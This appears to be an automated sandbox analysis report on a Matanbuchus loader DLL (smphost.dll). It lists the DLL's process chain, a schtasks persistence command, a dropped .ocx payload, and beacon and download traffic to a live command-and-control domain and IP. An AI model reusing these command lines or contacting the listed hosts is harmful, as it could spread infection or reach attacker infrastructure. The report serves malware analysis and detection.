Source: smphost.dll |
Virustotal: Detection: 8% |
Perma Link |
Source: http://manageintel.com/WUzZRUBQje/Auth.php |
Avira URL Cloud: Label: malware |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: certificate valid |
Source: |
Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EED8A FindFirstFileExW, |
2_2_6E9EED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84ED8A FindFirstFileExW, |
38_2_6F84ED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
|
Source: unknown |
Network traffic detected: HTTP traffic on port 49762 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49762 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49843 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49843 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49844 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49844 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49845 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49845 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49846 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49846 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49847 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49847 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49848 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49848 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49849 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49849 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49850 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49850 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49851 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49851 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49852 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49852 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49853 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49853 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49854 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49854 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49855 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49855 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle, |
2_2_6E9E8210 |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49841 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49841 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49840 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49840 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://manageintel.com/ |
Source: regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml |
Source: regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml |
Source: unknown |
HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4c 64 57 74 33 63 57 5a 75 59 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 56 53 58 42 59 64 31 6c 48 63 44 52 33 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJLdWt3cWZuYiIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJVSXBYd1lHcDR3PT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0= |
Source: unknown |
DNS traffic detected: queries for: manageintel.com |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle, |
2_2_6E9E8210 |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9F3EB6 |
2_2_6E9F3EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8C90 |
2_2_6E9E8C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F853EB6 |
38_2_6F853EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F848C90 |
38_2_6F848C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6E9E9960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6F849960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: smphost.dll |
Virustotal: Detection: 8% |
Source: smphost.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: unknown |
Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 |
|
Source: unknown |
Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp |
Jump to behavior |
Source: classification engine |
Classification label: mal88.troj.evad.winDLL@22/7@16/2 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
2_2_6E9E8630 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Mutant created: \Sessions\1\BaseNamedObjects\computer |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: smphost.dll |
Static PE information: certificate valid |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Jump to dropped file |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Jump to dropped file |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Source: unknown |
Network traffic detected: HTTP traffic on port 49762 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49762 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49843 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49843 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49844 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49844 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49845 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49845 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49846 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49846 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49847 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49847 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49848 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49848 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49849 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49849 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49850 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49850 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49851 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49851 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49852 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49852 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49853 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49853 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49854 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49854 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49855 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49855 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -330000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information queried: ProcessInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EED8A FindFirstFileExW, |
2_2_6E9EED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84ED8A FindFirstFileExW, |
38_2_6F84ED8A |
Source: C:\Windows\System32\loaddll32.exe |
Thread delayed: delay time: 120000 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Thread delayed: delay time: 30000 |
Jump to behavior |
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG |
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: eCATR3i7EpbaN9iNfeSlpa+LReiKwHVl5h2XxKhGfSRSHDvGdRfoP4L+/8cPCQAA |
